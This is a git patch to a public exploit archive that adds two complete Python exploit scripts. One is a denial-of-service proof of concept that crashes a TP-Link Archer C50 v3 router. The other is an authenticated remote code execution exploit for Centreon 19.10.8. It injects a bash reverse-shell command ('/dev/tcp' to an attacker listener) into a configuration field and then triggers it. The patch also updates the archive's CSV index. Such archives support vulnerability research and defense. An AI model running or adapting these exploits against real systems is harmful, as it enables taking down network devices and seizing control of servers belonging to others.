From 4b289033f478890e9fb3048403e0b21c6b2c85d2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 27 Mar 2020 05:01:46 +0000 Subject: [PATCH] DB: 2020-03-27 3 changes to exploits/shellcodes TP-Link Archer C50 3 - Denial of Service (PoC) Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution --- exploits/hardware/webapps/48255.py | 42 ++++++++++++++ exploits/php/webapps/48241.py | 1 + exploits/php/webapps/48256.py | 91 ++++++++++++++++++++++++++++++ files_exploits.csv | 2 + 4 files changed, 136 insertions(+) create mode 100755 exploits/hardware/webapps/48255.py create mode 100755 exploits/php/webapps/48256.py diff --git a/exploits/hardware/webapps/48255.py b/exploits/hardware/webapps/48255.py new file mode 100755 index 000000000..7c0761e12 --- /dev/null +++ b/exploits/hardware/webapps/48255.py @@ -0,0 +1,42 @@ +# Exploit Title: TP-Link Archer C50 3 - Denial of Service (PoC) +# Date: 2020-01-25 +# Exploit Author: thewhiteh4t +# Vendor Homepage: https://www.tp-link.com/ +# Version: TP-Link Archer C50 v3 Build 171227 +# Tested on: Arch Linux x64 +# CVE: CVE-2020-9375 +# Description: https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html + +import time +import socket + +ip = '192.168.0.1' +port = 80 + +print('[+] IP : ' + ip) +print('[+] Port : ' + str(port)) + +for i in range(2): + time.sleep(1) + try: + print('[+] Initializing Socket...') + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(5) + print('[!] Connecting to target...') + s.connect((ip, port)) + header = 'GET / HTTP/1.1\r\nHost: {}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nReferer: thewhiteh4t\r\n\r\n'.format(ip) + header = header.encode() + print('[!] Sending Request...') + s.sendall(header) + print('[!] Disconnecting Socket...') + s.close() + if i == 1: + print('[-] Exploit Failed!') + break + except Exception as e: + if 'Connection refused' in str(e): + print('[+] Connection Refused...Exploit Successful!') + break + else: + print('[-] Exploit Failed!') + break \ No newline at end of file diff --git a/exploits/php/webapps/48241.py b/exploits/php/webapps/48241.py index 2d0a3ce6b..68db0f529 100755 --- a/exploits/php/webapps/48241.py +++ b/exploits/php/webapps/48241.py @@ -5,6 +5,7 @@ # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip # Version: rConfig 3.9.4 # Tested on: Cent OS 7 (1908) +# CVE: CVE-2020-10879 #!/usr/bin/python3 diff --git a/exploits/php/webapps/48256.py b/exploits/php/webapps/48256.py new file mode 100755 index 000000000..d8f361e2e --- /dev/null +++ b/exploits/php/webapps/48256.py @@ -0,0 +1,91 @@ +# Exploit Title: Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution +# Date: 2020-03-25 +# Exploit Author: Engin Demirbilek +# Vendor Homepage: https://www.centreon.com/ +# Version: 19.10.8 +# Tested on: CentOS +# Advisory link: https://engindemirbilek.github.io/centreon-19.10-rce +# Corresponding pull request on github: https://github.com/centreon/centreon/pull/8467#event-3163627607 + +#!/usr/bin/python + +import requests +import sys +import warnings +from bs4 import BeautifulSoup + +warnings.filterwarnings("ignore", category=UserWarning, module='bs4') + +if len(sys.argv) < 6: + print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort" + exit() + +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +ip = sys.argv[4] +port = sys.argv[5] + + +req = requests.session() +print("[+] Retrieving CSRF token...") +loginPage = req.get(url+"/index.php") +response = loginPage.text +s = BeautifulSoup(response, 'html.parser') +centreon_token = s.find('input', {'name':'centreon_token'})['value'] + +login_creds = { + "useralias": username, + "password": password, + "submitLogin": "Connect", + "centreon_token": centreon_token +} + + +print("[+] Sendin login request...") +login = req.post(url+"/index.php", login_creds) + +if "incorrect" not in login.text: + print("[+] Logged In, retrieving second token") + + page = url + "/main.get.php?p=50118" + second_token_req = req.get(page) + response = second_token_req.text + s = BeautifulSoup(response, 'html.parser') + second_token = s.find('input', {'name':'centreon_token'})['value'] + + payload = { + "RRDdatabase_path": "/var/lib/centreon/metrics/", + "RRDdatabase_status_path": ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(ip, port), + "RRDdatabase_nagios_stats_path": "/var/lib/centreon/nagios-perf/", + "reporting_retention": "365", + "archive_retention": "31", + "len_storage_mysql": "365", + "len_storage_rrd": "180", + "len_storage_downtimes": "0", + "len_storage_comments": "0", + "partitioning_retention": "365", + "partitioning_retention_forward": "10", + "cpartitioning_backup_directory": "/var/cache/centreon/backup", + "audit_log_option": "1", + "audit_log_retention": "0", + "submitC": "Save", + "gopt_id": "", + "o": "storage", + "o": "storage", + "centreon_token": second_token, + + + } + print("[+] Sendin payload...") + send_payload = req.post(page, payload) + + trigger_url= url + "/include/views/graphs/graphStatus/displayServiceStatus.php" + print("[+] Triggerring payload...") + trigger = req.get(trigger_url) + + print("[+] Check your listener !...") + +else: + print("[-] Wrong credentials") + exit() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1c5c40274..0c07fad96 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42501,3 +42501,5 @@ id,file,description,date,author,type,platform,port 48247,exploits/hardware/webapps/48247.py,"UCM6202 1.0.18.13 - Remote Command Injection",2020-03-24,"Jacob Baines",webapps,hardware, 48248,exploits/php/webapps/48248.txt,"Joomla! Component GMapFP 3.30 - Arbitrary File Upload",2020-03-25,ThelastVvV,webapps,php, 48250,exploits/php/webapps/48250.txt,"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting",2020-03-25,SunCSR,webapps,php, +48255,exploits/hardware/webapps/48255.py,"TP-Link Archer C50 3 - Denial of Service (PoC)",2020-03-26,thewhiteh4t,webapps,hardware, +48256,exploits/php/webapps/48256.py,"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution",2020-03-26,"Engin Demirbilek",webapps,php,